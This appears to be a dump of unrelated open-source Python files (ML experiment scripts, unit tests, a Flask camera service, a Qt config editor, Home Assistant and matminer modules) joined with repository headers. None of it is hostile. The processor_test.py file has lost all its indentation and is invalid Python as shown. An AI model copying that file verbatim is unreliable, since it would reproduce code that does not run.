#also save muw/Sigw/etc for plotting coreset visualizations
f = open('results/coreset_data.pk', 'wb')
res = (x, mu0, Sig0, Sig, mup, Sigp, w, p, muw, Sigw)
pk.dump(res, f)
f.close()
############################
############################
## Parse arguments
############################
############################
parser = argparse.ArgumentParser(description="Runs Gaussian posterior inference (employing coreset construction) on a synthetic dataset")
subparsers = parser.add_subparsers(help='sub-command help')
run_subparser = subparsers.add_parser('run', help='Runs the main computational code')
run_subparser.set_defaults(func=run)
plot_subparser = subparsers.add_parser('plot', help='Plots the results')
plot_subparser.set_defaults(func=plot)
parser.add_argument('--data_num', type=int, default='1000', help='Dataset size/number of examples')
parser.add_argument('--data_dim', type=int, default = '200', help="The dimension of the multivariate normal distribution to use for this experiment")
parser.add_argument('--alg', type=str, default='SVI', choices = ['SVI', 'SVI-EXACT', 'GIGA-OPT', 'GIGA-OPT-EXACT', 'GIGA-REAL', 'GIGA-REAL-EXACT', 'US'], help="The name of the coreset construction algorithm to use")
parser.add_argument("--proj_dim", type=int, default=100, help="The number of samples taken when discretizing log likelihoods for these experiments")
parser.add_argument('--coreset_size_max', type=int, default=200, help="The maximum coreset size to evaluate")
parser.add_argument('--coreset_num_sizes', type=int, default=7, help="The number of coreset sizes to evaluate")
parser.add_argument('--coreset_size_spacing', type=str, choices=['log', 'linear'], default='log', help="The spacing of coreset sizes to test")
parser.add_argument('--opt_itrs', type=int, default = 100, help="Number of optimization iterations (for methods that use iterative weight refinement)")
parser.add_argument('--step_sched', type=str, default = "lambda i : 1./(1+i)", help="Optimization step schedule (for methods that use iterative weight refinement); entered as a python lambda expression surrounded by quotes")
parser.add_argument('--trial', type=int, help="The trial number - used to initialize random number generation (for replicability)")
parser.add_argument('--results_folder', type=str, default="results/", help="This script will save results in this folder")
parser.add_argument('--verbosity', type=str, default="error", choices=['error', 'warning', 'critical', 'info', 'debug'], help="The verbosity level.")
# plotting arguments
plot_subparser.add_argument('plot_x', type = str, help="The X axis of the plot")
plot_subparser.add_argument('plot_y', type = str, help="The Y axis of the plot")
plot_subparser.add_argument('--plot_title', type = str, help="The title of the plot")
plot_subparser.add_argument('--plot_x_label', type = str, help="The X axis label of the plot")
plot_subparser.add_argument('--plot_y_label', type = str, help="The Y axis label of the plot")
plot_subparser.add_argument('--plot_x_type', type=str, choices=["linear","log"], default = "log", help = "Specifies the scale for the X-axis")
plot_subparser.add_argument('--plot_y_type', type=str, choices=["linear","log"], default = "log", help = "Specifies the scale for the Y-axis.")
plot_subparser.add_argument('--plot_legend', type=str, help = "Specifies the variable to create a legend for.")
plot_subparser.add_argument('--plot_height', type=int, default=850, help = "Height of the plot's html canvas")
plot_subparser.add_argument('--plot_width', type=int, default=850, help = "Width of the plot's html canvas")
plot_subparser.add_argument('--plot_type', type=str, choices=['line', 'scatter'], default='scatter', help = "Type of plot to make")
plot_subparser.add_argument('--plot_fontsize', type=str, default='32pt', help = "Font size for the figure, e.g., 32pt")
plot_subparser.add_argument('--plot_toolbar', action='store_true', help = "Show the Bokeh toolbar")
plot_subparser.add_argument('--summarize', type=str, nargs='*', help = 'The command line arguments to ignore value of when matching to plot a subset of data. E.g. --summarize trial data_num will compute result statistics over both trial and number of datapoints')
plot_subparser.add_argument('--groupby', type=str, help = 'The command line argument group rows by before plotting. No groupby means plotting raw data; groupby will do percentile stats for all data with the same groupby value. E.g. --groupby Ms in a scatter plot will compute result statistics for fixed values of M, i.e., there will be one scatter point per value of M')
arguments = parser.parse_args()
arguments.func(arguments)
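# Example invocations (illustrative; the flag values are arbitrary assumptions).
# The shared flags are defined on the top-level parser, so they go before the
# `run`/`plot` sub-command:
#
#   python main.py --alg GIGA-OPT --trial 1 --data_dim 20 --data_num 500 run
#   python main.py --trial 1 plot Ms rklw --plot_legend alg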
|
results-processor/processor_test.py
|
lucacasonato/wpt.fyi
| 122 |
115979
|
# Copyright 2019 The WPT Dashboard Project. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import unittest
from unittest.mock import call, patch
from werkzeug.datastructures import MultiDict
import test_util
import wptreport
from processor import Processor, process_report
from test_server import AUTH_CREDENTIALS
class ProcessorTest(unittest.TestCase):
def fake_download(self, expected_path, response):
def _download(path):
if expected_path is None:
self.fail('Unexpected download:' + path)
self.assertEqual(expected_path, path)
return response
return _download
def test_known_extension(self):
self.assertEqual(
Processor.known_extension('https://wpt.fyi/test.json.gz'),
'.json.gz')
self.assertEqual(
Processor.known_extension('https://wpt.fyi/test.txt.gz'),
'.txt.gz')
self.assertEqual(
Processor.known_extension('https://wpt.fyi/test.json'), '.json')
self.assertEqual(
Processor.known_extension('https://wpt.fyi/test.txt'), '.txt')
self.assertEqual(
Processor.known_extension('artifact.zip'), '.zip')
def test_download(self):
with Processor() as p:
p._download_gcs = self.fake_download(
'gs://wptd/foo/bar.json', '/fake/bar.json')
p._download_http = self.fake_download(
'https://wpt.fyi/test.txt.gz', '/fake/test.txt.gz')
p.download(
['gs://wptd/foo/bar.json'],
['https://wpt.fyi/test.txt.gz'],
None)
self.assertListEqual(p.results, ['/fake/bar.json'])
self.assertListEqual(p.screenshots, ['/fake/test.txt.gz'])
def test_download_azure(self):
with Processor() as p:
p._download_gcs = self.fake_download(None, None)
p._download_http = self.fake_download(
'https://wpt.fyi/artifact.zip', 'artifact_test.zip')
p.download([], [], 'https://wpt.fyi/artifact.zip')
self.assertEqual(len(p.results), 2)
self.assertTrue(p.results[0].endswith(
'/artifact_test/wpt_report_1.json'))
self.assertTrue(p.results[1].endswith(
'/artifact_test/wpt_report_2.json'))
self.assertEqual(len(p.screenshots), 2)
self.assertTrue(p.screenshots[0].endswith(
'/artifact_test/wpt_screenshot_1.txt'))
self.assertTrue(p.screenshots[1].endswith(
'/artifact_test/wpt_screenshot_2.txt'))
def test_download_azure_errors(self):
with Processor() as p:
p._download_gcs = self.fake_download(None, None)
p._download_http = self.fake_download(
'https://wpt.fyi/artifact.zip', None)
# Incorrect param combinations (both results & azure_url):
with self.assertRaises(AssertionError):
p.download(['https://wpt.fyi/test.json.gz'],
[],
'https://wpt.fyi/artifact.zip')
# Download failure: no exceptions should be raised.
p.download([], [], 'https://wpt.fyi/artifact.zip')
self.assertEqual(len(p.results), 0)
class MockProcessorTest(unittest.TestCase):
@patch('processor.Processor')
def test_params_plumbing_success(self, MockProcessor):
# Set up mock context manager to return self.
mock = MockProcessor.return_value
mock.__enter__.return_value = mock
mock.check_existing_run.return_value = False
mock.results = ['/tmp/wpt_report.json.gz']
mock.raw_results_url = 'https://wpt.fyi/test/report.json'
mock.results_url = 'https://wpt.fyi/test'
mock.test_run_id = 654321
# NOTE: if you need to change the following params, you probably also
# want to change api/receiver/api.go.
params = MultiDict({
'uploader': 'blade-runner',
'id': '654321',
'callback_url': 'https://test.wpt.fyi/api',
'labels': 'foo,bar',
'results': 'https://wpt.fyi/wpt_report.json.gz',
'browser_name': 'Chrome',
'browser_version': '70',
'os_name': 'Linux',
'os_version': '5.0',
'revision': '21917b36553562d21c14fe086756a57cbe8a381b',
})
process_report('12345', params)
mock.assert_has_calls([
call.update_status('654321', 'WPTFYI_PROCESSING', None,
'https://test.wpt.fyi/api'),
call.download(['https://wpt.fyi/wpt_report.json.gz'], [], None),
])
mock.report.update_metadata.assert_called_once_with(
revision='21917b36553562d21c14fe086756a57cbe8a381b',
browser_name='Chrome', browser_version='70',
os_name='Linux', os_version='5.0')
mock.create_run.assert_called_once_with(
'654321', 'foo,bar', 'blade-runner', 'https://test.wpt.fyi/api')
@patch('processor.Processor')
def test_params_plumbing_error(self, MockProcessor):
# Set up mock context manager to return self.
mock = MockProcessor.return_value
mock.__enter__.return_value = mock
mock.results = ['/tmp/wpt_report.json.gz']
mock.load_report.side_effect = wptreport.InvalidJSONError
params = MultiDict({
'uploader': 'blade-runner',
'id': '654321',
'results': 'https://wpt.fyi/wpt_report.json.gz',
})
# Suppress print_exception.
with patch('traceback.print_exception'):
process_report('12345', params)
mock.assert_has_calls([
call.update_status('654321', 'WPTFYI_PROCESSING', None, None),
call.download(['https://wpt.fyi/wpt_report.json.gz'], [], None),
call.load_report(),
call.update_status(
'654321', 'INVALID',
"Invalid JSON (['https://wpt.fyi/wpt_report.json.gz'])", None),
])
mock.create_run.assert_not_called()
@patch('processor.Processor')
def test_params_plumbing_empty(self, MockProcessor):
# Set up mock context manager to return self.
mock = MockProcessor.return_value
mock.__enter__.return_value = mock
mock.results = []
params = MultiDict({
'uploader': 'blade-runner',
'id': '654321',
})
with self.assertLogs():
process_report('12345', params)
mock.assert_has_calls([
call.update_status('654321', 'WPTFYI_PROCESSING', None, None),
call.download([], [], None),
call.update_status('654321', 'EMPTY', None, None),
])
mock.create_run.assert_not_called()
@patch('processor.Processor')
def test_params_plumbing_duplicate(self, MockProcessor):
# Set up mock context manager to return self.
mock = MockProcessor.return_value
mock.__enter__.return_value = mock
mock.check_existing_run.return_value = True
mock.results = ['/tmp/wpt_report.json.gz']
mock.raw_results_url = 'https://wpt.fyi/test/report.json'
params = MultiDict({
'uploader': 'blade-runner',
'id': '654321',
'results': 'https://wpt.fyi/wpt_report.json.gz',
})
with self.assertLogs():
process_report('12345', params)
mock.update_status.assert_has_calls([
call('654321', 'WPTFYI_PROCESSING', None, None),
call('654321', 'DUPLICATE', None, None),
])
mock.create_run.assert_not_called()
class ProcessorDownloadServerTest(unittest.TestCase):
"""This class tests behaviours of Processor related to downloading
artifacts (e.g. JSON reports) from an external server. test_server is used
to emulate the success and failure modes of an external server.
"""
def setUp(self):
self.server, self.url = test_util.start_server(False)
def tearDown(self):
self.server.terminate()
self.server.wait()
def test_download_single(self):
with Processor() as p:
# The endpoint returns "Hello, world!".
path = p._download_single(self.url + '/download/test.txt')
self.assertTrue(path.endswith('.txt'))
with open(path, 'rb') as f:
self.assertEqual(f.read(), b'Hello, world!')
def test_download(self):
with Processor() as p:
p.TIMEOUT_WAIT = 0.1 # to speed up tests
url_404 = self.url + '/404'
url_timeout = self.url + '/slow'
with self.assertLogs() as lm:
p.download(
[self.url + '/download/test.txt', url_timeout],
[url_404],
None)
self.assertEqual(len(p.results), 1)
self.assertTrue(p.results[0].endswith('.txt'))
self.assertEqual(len(p.screenshots), 0)
self.assertListEqual(
lm.output,
['ERROR:processor:Timed out fetching: ' + url_timeout,
'ERROR:processor:Failed to fetch (404): ' + url_404])
def test_download_content_disposition(self):
with Processor() as p:
# The response of this endpoint sets Content-Disposition with
# artifact_test.zip as the filename.
path = p._download_single(self.url + '/download/attachment')
self.assertTrue(path.endswith('.zip'))
class ProcessorAPIServerTest(unittest.TestCase):
"""This class tests API calls from Processor to webapp (e.g.
/api/results/create, /api/status). test_server is used to emulate webapp
and verify credentials and payloads.
"""
def setUp(self):
self.server, self.url = test_util.start_server(True)
def tearDown(self):
if self.server.poll() is None:
self.server.kill()
def test_update_status(self):
with Processor() as p:
p._auth = AUTH_CREDENTIALS
p.report.update_metadata(
browser_name='Chrome',
browser_version='70',
os_name='Linux',
os_version='5.0',
revision='21917b36553562d21c14fe086756a57cbe8a381b')
p.update_status(
run_id='12345', stage='INVALID',
error='Sample error', callback_url=self.url)
self.server.terminate()
_, err = self.server.communicate()
response = json.loads(err)
self.assertDictEqual(response, {
'id': 12345, 'stage': 'INVALID', 'error': 'Sample error',
'browser_name': 'Chrome', 'browser_version': '70',
'os_name': 'Linux', 'os_version': '5.0',
'full_revision_hash': '21917b36553562d21c14fe086756a57cbe8a381b',
})
def test_create_run(self):
api = self.url + '/api/results/create'
with Processor() as p:
p._auth = AUTH_CREDENTIALS
p.report.update_metadata(
browser_name='chrome',
browser_version='70',
os_name='Linux',
revision='21917b36553562d21c14fe086756a57cbe8a381b')
p.create_run('12345', '', 'blade-runner', callback_url=api)
# p.test_run_id is set based on the response from the API, which in
# turn is set according to the request. Hence this verifies that we
# pass the run ID to the API correctly.
self.assertEqual(p.test_run_id, 12345)
self.server.terminate()
# This is needed to close the stdio pipes.
self.server.communicate()
|
bin/evaluate-dataset-Adult.py
|
e-orlov/autosklearn-zeroconf
| 176 |
115991
|
# -*- coding: utf-8 -*-
"""
Copyright 2017 <NAME>
Created on Sun Apr 23 11:52:59 2017
@author: ekobylkin
This is an example on how to prepare data for autosklearn-zeroconf.
It is using a well known Adult (Salary) dataset from UCI https://archive.ics.uci.edu/ml/datasets/Adult .
"""
import pandas as pd
test = pd.read_csv(filepath_or_buffer='./data/adult.test.withid',sep=',', error_bad_lines=False, index_col=False)
#print(test)
prediction = pd.read_csv(filepath_or_buffer='./data/zeroconf-result.csv',sep=',', error_bad_lines=False, index_col=False)
#print(prediction)
df=pd.merge(test, prediction, how='inner', on=['cust_id',])
y_test=df['category']
y_hat=df['prediction']
from sklearn.metrics import (confusion_matrix, precision_score
, recall_score, f1_score, accuracy_score)
from time import time,sleep,strftime
def p(text):
for line in str(text).splitlines():
print ('[ZEROCONF] '+line+" # "+strftime("%H:%M:%S")+" #")
p("\n")
p("#"*72)
p("Accuracy score {0:2.0%}".format(accuracy_score(y_test, y_hat)))
p("The below scores are calculated for predicting '1' category value")
p("Precision: {0:2.0%}, Recall: {1:2.0%}, F1: {2:.2f}".format(
precision_score(y_test, y_hat),recall_score(y_test, y_hat),f1_score(y_test, y_hat)))
p("Confusion Matrix: https://en.wikipedia.org/wiki/Precision_and_recall")
p(confusion_matrix(y_test, y_hat))
baseline_1 = str(sum(a for a in y_test))
baseline_all = str(len(y_test))
baseline_prcnt = "{0:2.0%}".format( float(sum(a for a in y_test)/len(y_test)))
p("Baseline %s positives from %s overall = %1.1f%%" %
(sum(a for a in y_test), len(y_test), 100*sum(a for a in y_test)/len(y_test)))
p("#"*72)
p("\n")
|
pipeline/python/ion/reports/plotKey.py
|
konradotto/TS
| 125 |
115992
|
# Copyright (C) 2010 Ion Torrent Systems, Inc. All Rights Reserved
import os
import sys
from ion.reports.plotters import plotters
from numpy import median
class KeyPlot:
def __init__(self, key, floworder, title=None):
self.data = None
self.key = key
self.floworder = floworder
self.title = title
self.average_peak = None
def plot(self, outdir=os.getcwd()):
expected = [1 for i in range(len(self.key) - 1)]
tracePlot = plotters.Iontrace(
self.key,
expected,
self.data,
title="Consensus Key 1-Mer - %s Ave. Peak = %s"
% (self.title, self.average_peak),
)
tracePlot.render()
tracePlot.save(
os.path.join(outdir, "iontrace_%s" % self.title.replace(" ", "_"))
)
def parse(self, fileIn):
d = open(fileIn, "r")
data = d.readlines()
d.close()
trace = {}
        max_len = None  # max length needed to fill in null values
        for line in data:
            t = line.strip().split(" ")
            fTrace = [float(i) for i in t[1:]]
            trace[t[0]] = fTrace
            if max_len is None or len(fTrace) > max_len:
                max_len = len(fTrace)
        toPlot = []
        for k in self.key:
            if k in list(trace.keys()):
                toPlot.append(trace[k])
            else:
                toPlot.append([0 for i in range(max_len)])
self.data = trace
return toPlot
def dump_max(self, fileName):
try:
with open(fileName, "a") as f:
max_array = [
max(trace) for k, trace in list(self.data.items()) if k in self.key
]
self.average_peak = int(median(max_array)) if len(max_array) > 0 else 0
f.write("%s = %s\n" % (self.title, self.average_peak))
except Exception:
print("Can't open file")
if __name__ == "__main__":
libKey = sys.argv[2]
floworder = sys.argv[3]
fileIn = sys.argv[1]
fileOut = sys.argv[4]
kp = KeyPlot(libKey, floworder, "Test Fragment")
kp.parse(fileIn)
kp.dump_max(fileOut)
kp.plot()
|
retail-of-the-future-demo/IgniteSolution/modules/CameraStream/camera-stream/camera.py
|
piyushka17/azure-intelligent-edge-patterns
| 176 |
115993
|
import cv2
import os, logging, time, json
import requests, base64
from flask import Flask, jsonify, request, Response
import numpy as np
# for HTTP/1.1 support
from werkzeug.serving import WSGIRequestHandler
app = Flask(__name__)
logging.basicConfig(format='%(asctime)s %(levelname)-10s %(message)s', datefmt="%Y-%m-%d-%H-%M-%S",
level=logging.INFO)
def main():
pass
def grab_image_from_stream():
repeat = 3
wait = 3
frame = None
for _ in range(repeat):
try:
video_capture = cv2.VideoCapture(args.camera)
video_capture.set(cv2.CAP_PROP_BUFFERSIZE, 1)
frame = video_capture.read()[1]
break
        except Exception:
# try to re-capture the stream
logging.info("Could not capture video. Recapturing and retrying...")
time.sleep(wait)
if frame is None:
logging.info("Failed to capture frame, sending blank image")
        frame = np.zeros((300, 300, 3), dtype=np.uint8)
return frame
@app.route('/image/700')
def video_image():
frame = grab_image_from_stream()
_, jpeg = cv2.imencode('.jpg', frame)
response = Response(jpeg.tobytes(), headers={"content-length": len(jpeg)}, mimetype="image/jpeg")
return response
@app.route('/image/800')
def video_image_and_inference():
frame = grab_image_from_stream()
frame = cv2.resize(frame, (300, 300))
_, jpeg = cv2.imencode('.jpg', frame)
resp_img = jpeg.tobytes()
scoring_url = "http://grocerymodel:5001/score"
json_img = json.dumps({"img": frame.tolist()})
input_data = json_img
headers = {'Content-Type':'application/json'}
resp = requests.post(scoring_url, input_data, headers=headers)
logging.info(f'received response: {resp.status_code}')
resp_json = json.loads(resp.content)
resp_json["img"] = str(base64.b64encode(resp_img), "utf-8")
return jsonify(resp_json)
def start_app():
# set protocol to 1.1 so we keep the connection open
WSGIRequestHandler.protocol_version = "HTTP/1.1"
if args.fast:
logging.info("Running the `fast` version")
app.run(host="0.0.0.0", port=args.port)
else:
logging.info(f"Staring regular inventory cam. Port: {args.port}")
app.run(debug=False)
if __name__ == "__main__":
from cmdline import cmd_args
args = cmd_args.parse_camera_args()
if not args.fast:
app.config['SERVER_NAME'] = f'inventorycam:{args.port}'
if args.debug:
logging.info("Please attach a debugger to port 5678")
import ptvsd
ptvsd.enable_attach(('0.0.0.0', 5681))
ptvsd.wait_for_attach()
ptvsd.break_into_debugger()
start_app()
|
main/neigh_samplers.py
|
RuYunW/Graph2Seq-master
| 210 |
116005
|
from layers import Layer
import tensorflow as tf
class UniformNeighborSampler(Layer):
"""
Uniformly samples neighbors.
Assumes that adj lists are padded with random re-sampling
"""
def __init__(self, adj_info, **kwargs):
super(UniformNeighborSampler, self).__init__(**kwargs)
self.adj_info = adj_info
def _call(self, inputs):
ids, num_samples = inputs
adj_lists = tf.nn.embedding_lookup(self.adj_info, ids)
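        # Note: the double transpose below is a no-op as written; the GraphSAGE
        # implementation this sampler is modeled on typically applies
        # tf.random_shuffle between the two transposes so that the slice that
        # follows picks a random subset of neighbors rather than the first ones.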
adj_lists = tf.transpose(tf.transpose(adj_lists))
adj_lists = tf.slice(adj_lists, [0,0], [-1, num_samples])
return adj_lists
|
homeassistant/components/dnsip/const.py
|
MrDelik/core
| 30,023 |
116006
|
<reponame>MrDelik/core<gh_stars>1000+
"""Constants for dnsip integration."""
from homeassistant.const import Platform
DOMAIN = "dnsip"
PLATFORMS = [Platform.SENSOR]
CONF_HOSTNAME = "hostname"
CONF_RESOLVER = "resolver"
CONF_RESOLVER_IPV6 = "resolver_ipv6"
CONF_IPV4 = "ipv4"
CONF_IPV6 = "ipv6"
DEFAULT_HOSTNAME = "myip.opendns.com"
DEFAULT_IPV6 = False
DEFAULT_NAME = "myip"
DEFAULT_RESOLVER = "208.67.222.222"
DEFAULT_RESOLVER_IPV6 = "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b"
|
diagrams/k8s/podconfig.py
|
Shimpei-GANGAN/diagrams
| 17,037 |
116008
|
# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _K8S
class _Podconfig(_K8S):
_type = "podconfig"
_icon_dir = "resources/k8s/podconfig"
class CM(_Podconfig):
_icon = "cm.png"
class Secret(_Podconfig):
_icon = "secret.png"
# Aliases
ConfigMap = CM
|
envi/qt/config.py
|
rnui2k/vivisect
| 716 |
116017
|
<reponame>rnui2k/vivisect<gh_stars>100-1000
'''
A widget for editing EnviConfig options.
'''
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import *
class EnviConfigOption:
def __init__(self, config, name, value):
self.econfig = config
self.ename = name
self.evalue = value
def setEnviValue(self, evalue):
self.evalue = evalue
self.econfig[self.ename] = evalue
class EnviConfigBool(EnviConfigOption,QCheckBox):
def __init__(self, config, name, value, parent=None):
QCheckBox.__init__(self, parent=parent)
EnviConfigOption.__init__(self, config, name, value)
self.toggled.connect(self.setEnviValue)
self.setChecked(value)
def parseEnviValue(self):
self.setEnviValue(self.isChecked())
class EnviConfigInt(EnviConfigOption,QLineEdit):
def __init__(self, config, name, value, parent=None):
QLineEdit.__init__(self, parent=parent)
EnviConfigOption.__init__(self, config, name, value)
self.editingFinished.connect(self.parseEnviValue)
valstr = str(value)
if value > 1024:
valstr = '0x%.8x' % value
self.setText(valstr)
def parseEnviValue(self):
self.setEnviValue(int(str(self.text()),0))
class EnviConfigString(EnviConfigOption,QLineEdit):
def __init__(self, config, name, value, parent=None):
QLineEdit.__init__(self, parent=parent)
EnviConfigOption.__init__(self, config, name, value)
self.editingFinished.connect(self.parseEnviValue)
self.setText(value)
def parseEnviValue(self):
self.setEnviValue(str(self.text()))
cfgtypes = {
int: EnviConfigInt,
str: EnviConfigString,
bool: EnviConfigBool,
}
class EnviConfigEditor(QWidget):
def __init__(self, config, parent=None):
QWidget.__init__(self, parent=parent)
self.enviconfig = config
lyt = QFormLayout()
optnames = list(config.keys())
optnames.sort()
for optname in optnames:
optval = config.get(optname)
cls = cfgtypes.get(type(optval))
if cls is None:
continue
label = QLabel(optname)
clsobj = cls(config, optname, optval, parent=self)
doc = config.getOptionDoc(optname)
if doc is not None:
label.setToolTip(doc)
lyt.addRow(label, clsobj)
self.setLayout(lyt)
class EnviConfigTabs(QTabWidget):
'''
A widget for a multi-tab multi-config
editor view. Specify a list of (name,config)
tuples.
'''
def __init__(self, configs, parent=None):
QTabWidget.__init__(self, parent=parent)
for name,config in configs:
editor = EnviConfigEditor(config, parent=self)
self.addTab(editor, name)
|
data/transforms/utils.py
|
apple/ml-cvnets
| 209 |
116019
|
<reponame>apple/ml-cvnets<gh_stars>100-1000
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
from typing import Any
import numpy as np
def setup_size(size: Any, error_msg="Need a tuple of length 2"):
if isinstance(size, int):
return size, size
if isinstance(size, (list, tuple)) and len(size) == 1:
return size[0], size[0]
if len(size) != 2:
raise ValueError(error_msg)
return size
def intersect(box_a, box_b):
"""Computes the intersection between box_a and box_b"""
max_xy = np.minimum(box_a[:, 2:], box_b[2:])
min_xy = np.maximum(box_a[:, :2], box_b[:2])
inter = np.clip((max_xy - min_xy), a_min=0, a_max=np.inf)
return inter[:, 0] * inter[:, 1]
def jaccard_numpy(box_a: np.ndarray, box_b: np.ndarray):
"""
    Computes the intersection over union (Jaccard overlap) of box_a against box_b.
    Args:
        box_a (np.ndarray): Boxes of shape [Num_boxes_A, 4]
        box_b (np.ndarray): Single box of shape [4]
    Returns:
        Intersection over union scores. Shape is [Num_boxes_A,]
"""
inter = intersect(box_a, box_b)
area_a = (box_a[:, 2] - box_a[:, 0]) * (box_a[:, 3] - box_a[:, 1]) # [A,B]
area_b = (box_b[2] - box_b[0]) * (box_b[3] - box_b[1]) # [A,B]
union = area_a + area_b - inter
return inter / union # [A,B]
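# A minimal usage sketch (not part of the original module): IoU of two candidate
# boxes in [x1, y1, x2, y2] form against a single reference box.
if __name__ == "__main__":
    candidates = np.array([[0.0, 0.0, 2.0, 2.0], [1.0, 1.0, 3.0, 3.0]])
    reference = np.array([0.0, 0.0, 2.0, 2.0])
    print(jaccard_numpy(candidates, reference))  # -> [1.0, 0.14285714]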
|
suplemon/modules/diff.py
|
johnmbaughman/suplemon
| 912 |
116043
|
<gh_stars>100-1000
# -*- encoding: utf-8
import difflib
from suplemon.suplemon_module import Module
class Diff(Module):
"""View a diff of the current file compared to it's on disk version."""
def run(self, app, editor, args):
curr_file = app.get_file()
curr_path = curr_file.get_path()
if not curr_path:
self.app.set_status("File hasn't been saved, can't show diff.")
return False
current_data = editor.get_data()
f = open(curr_path)
original_data = f.read()
f.close()
diff = self.get_diff(original_data, current_data)
if not diff:
self.app.set_status("The file in the editor and on disk are identical.")
return False
file = app.new_file()
file.set_name(curr_file.get_name() + ".diff")
file.set_data(diff)
app.switch_to_file(app.last_file_index())
def get_diff(self, a, b):
a = a.splitlines(1)
b = b.splitlines(1)
diff = difflib.unified_diff(a, b)
return "".join(diff)
module = {
"class": Diff,
"name": "diff",
}
|
cachebrowser/settings/development.py
|
zhenyihan/cachebrowser
| 1,206 |
116050
|
<gh_stars>1000+
from cachebrowser.settings.base import CacheBrowserSettings
class DevelopmentSettings(CacheBrowserSettings):
def set_defaults(self):
self.host = "0.0.0.0"
self.port = 8080
self.ipc_port = 9000
self.database = 'db.sqlite'
self.bootstrap_sources = [
{
'type': 'local',
'path': self.data_path('local_bootstrap.yaml')
},
{
'type': 'remote',
'url': 'http://localhost:3000/api',
}
]
def data_dir(self):
return 'cachebrowser/data'
|
tests/components/freedompro/test_init.py
|
MrDelik/core
| 30,023 |
116067
|
"""Freedompro component tests."""
import logging
from unittest.mock import patch
from homeassistant.components.freedompro.const import DOMAIN
from homeassistant.config_entries import ConfigEntryState
from tests.common import MockConfigEntry
LOGGER = logging.getLogger(__name__)
ENTITY_ID = f"{DOMAIN}.fake_name"
async def test_async_setup_entry(hass, init_integration):
"""Test a successful setup entry."""
entry = init_integration
assert entry is not None
state = hass.states
assert state is not None
async def test_config_not_ready(hass):
"""Test for setup failure if connection to Freedompro is missing."""
entry = MockConfigEntry(
domain=DOMAIN,
title="Feedompro",
unique_id="0123456",
data={
"api_key": "<KEY>",
},
)
with patch(
"homeassistant.components.freedompro.get_list",
return_value={
"state": False,
},
):
entry.add_to_hass(hass)
await hass.config_entries.async_setup(entry.entry_id)
assert entry.state == ConfigEntryState.SETUP_RETRY
async def test_unload_entry(hass, init_integration):
"""Test successful unload of entry."""
entry = init_integration
assert len(hass.config_entries.async_entries(DOMAIN)) == 1
assert entry.state == ConfigEntryState.LOADED
assert await hass.config_entries.async_unload(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == ConfigEntryState.NOT_LOADED
|
test/hlt/pytest/python/com/huawei/iotplatform/client/dto/ServiceCapabilityDTO.py
|
yuanyi-thu/AIOT-
| 128 |
116089
|
from com.huawei.iotplatform.client.dto.ServiceCommand import ServiceCommand
from com.huawei.iotplatform.client.dto.ServiceProperty import ServiceProperty
class ServiceCapabilityDTO(object):
commands = ServiceCommand()
properties = ServiceProperty()
def __init__(self):
self.serviceId = None
self.serviceType = None
self.option = None
self.description = None
def getServiceId(self):
return self.serviceId
def setServiceId(self, serviceId):
self.serviceId = serviceId
def getServiceType(self):
return self.serviceType
def setServiceType(self, serviceType):
self.serviceType = serviceType
def getOption(self):
return self.option
def setOption(self, option):
self.option = option
def getDescription(self):
return self.description
def setDescription(self, description):
self.description = description
def getCommands(self):
return self.commands
def setCommands(self, commands):
self.commands = commands
def getProperties(self):
return self.properties
def setProperties(self, properties):
self.properties = properties
|
matminer/featurizers/site/external.py
|
ncfrey/matminer
| 326 |
116138
|
<gh_stars>100-1000
"""
Site featurizers requiring external libraries for core functionality.
"""
from monty.dev import requires
from pymatgen.io.ase import AseAtomsAdaptor
from sklearn.exceptions import NotFittedError
from pymatgen.core import Structure
from matminer.featurizers.base import BaseFeaturizer
# SOAPFeaturizer
try:
import dscribe
from dscribe.descriptors import SOAP as SOAP_dscribe
except ImportError:
dscribe, SOAP_dscribe = None, None
class SOAP(BaseFeaturizer):
"""
Smooth overlap of atomic positions (interface via DScribe).
    Class for generating a partial power spectrum from Smooth Overlap of Atomic
    Positions (SOAP). This implementation uses real (tesseral) spherical
harmonics as the angular basis set and provides two orthonormalized
alternatives for the radial basis functions: spherical primitive gaussian
type orbitals ("gto") or the polynomial basis set ("polynomial"). By
default the faster gto-basis is used. Please see the DScribe SOAP
documentation for more details.
Note that SOAP is only featurized for elements identified by "fit" (see
following), thus "fit" must be called before "featurize", or else an error
will be raised.
Based originally on the following publications:
"On representing chemical environments, <NAME>, <NAME>, and <NAME>, Phys. Rev. B 87, 184115, (2013),
https://doi.org/10.1103/PhysRevB.87.184115
"Comparing molecules and solids across structural and alchemical
space", <NAME>, <NAME>, <NAME> and <NAME>,
Phys. Chem. Chem. Phys. 18, 13754 (2016),
https://doi.org/10.1039/c6cp00415f
Implementation (and some documentation) originally based on DScribe:
https://github.com/SINGROUP/dscribe.
"DScribe: Library of descriptors for machine learning in materials science",
<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>. and <NAME>.
Computer Physics Communications, 106949 (2019),
https://doi.org/10.1016/j.cpc.2019.106949
Args:
rcut (float): A cutoff for local region in angstroms. Should be
bigger than 1 angstrom.
nmax (int): The number of radial basis functions.
lmax (int): The maximum degree of spherical harmonics.
sigma (float): The standard deviation of the gaussians used to expand the
atomic density.
rbf (str): The radial basis functions to use. The available options are:
* "gto": Spherical gaussian type orbitals defined as :math:`g_{nl}(r) = \sum_{n'=1}^{n_\mathrm{max}}\,\\beta_{nn'l} r^l e^{-\\alpha_{n'l}r^2}`
* "polynomial": Polynomial basis defined as :math:`g_{n}(r) = \sum_{n'=1}^{n_\mathrm{max}}\,\\beta_{nn'} (r-r_\mathrm{cut})^{n'+2}`
periodic (bool): Determines whether the system is considered to be
periodic.
crossover (bool): Determines if crossover of atomic types should
be included in the power spectrum. If enabled, the power
spectrum is calculated over all unique species combinations Z
and Z'. If disabled, the power spectrum does not contain
cross-species information and is only run over each unique
species Z. Turned on by default to correspond to the original
definition
"""
@requires(
dscribe,
"SOAPFeaturizer requires DScribe. Install from github.com/SINGROUP/dscribe",
)
def __init__(
self,
rcut,
nmax,
lmax,
sigma,
periodic,
rbf="gto",
crossover=True,
):
self.rcut = rcut
self.nmax = nmax
self.lmax = lmax
self.sigma = sigma
self.rbf = rbf
self.periodic = periodic
